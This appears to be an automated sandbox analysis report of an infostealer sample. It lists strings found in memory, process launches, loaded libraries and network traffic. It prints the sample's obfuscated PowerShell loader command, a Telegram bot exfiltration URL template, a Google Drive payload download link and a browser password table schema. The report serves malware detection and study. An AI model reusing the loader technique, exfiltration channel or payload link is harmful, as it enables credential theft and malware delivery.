            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20a
            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB/r
            Source: powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000005.00000002.2129804635.000000000621A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000005.00000002.2141049620.00000000212F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n
            Source: msiexec.exe, 00000005.00000002.2129804635.000000000621A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6nCz
            Source: msiexec.exe, 00000005.00000002.2129804635.000000000621A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6niz%
            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000005.00000002.2129804635.00000000062A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/F
            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2129804635.0000000006277000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n&export=download
            Source: msiexec.exe, 00000005.00000002.2129804635.000000000628E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n&export=downloadP
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
            Source: svchost.exe, 00000004.00000003.1203467438.00000233FD4A0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.1254568952.0000000000A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
            Source: powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021E23000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021E23000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021E0B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021F10000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021F10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021F0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB/r
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
            Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
            Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.8:49690 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49691 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_00404F90 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404F90

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exeJump to dropped file
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_004030B8 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030B8
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_004061410_2_00406141
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_004047CF0_2_004047CF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_045193302_2_04519330
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_086C00402_2_086C0040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_086C52C02_2_086C52C0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_086C52D02_2_086C52D0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_086C87782_2_086C8778
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DBD2785_2_02DBD278
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DB53705_2_02DB5370
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DBC1465_2_02DBC146
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DBC7385_2_02DBC738
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DBC4685_2_02DBC468
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DBCA085_2_02DBCA08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DBE9885_2_02DBE988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DB3E095_2_02DB3E09
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DBCFA95_2_02DBCFA9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DBCCD85_2_02DBCCD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DB3AA15_2_02DB3AA1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DB39ED5_2_02DB39ED
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DB29EC5_2_02DB29EC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DB69A05_2_02DB69A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DBE97C5_2_02DBE97C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DBF9745_2_02DBF974
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DB6FC85_2_02DB6FC8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02DB9DE05_2_02DB9DE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_061E04485_2_061E0448
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_061E12D05_2_061E12D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_061E80785_2_061E8078
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsd51C8.tmp\nsExec.dll CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F
            Source: uPDwUy9ewY.exeStatic PE information: invalid certificate
            Source: uPDwUy9ewY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/19@5/6
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_00404293 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404293
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_03
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile created: C:\Users\user\AppData\Local\Temp\nsg4C68.tmpJump to behavior
            Source: uPDwUy9ewY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021FA4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021FE7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021FC2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021FF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: uPDwUy9ewY.exeVirustotal: Detection: 72%
            Source: uPDwUy9ewY.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile read: C:\Users\user\Desktop\uPDwUy9ewY.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\uPDwUy9ewY.exe "C:\Users\user\Desktop\uPDwUy9ewY.exe"
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
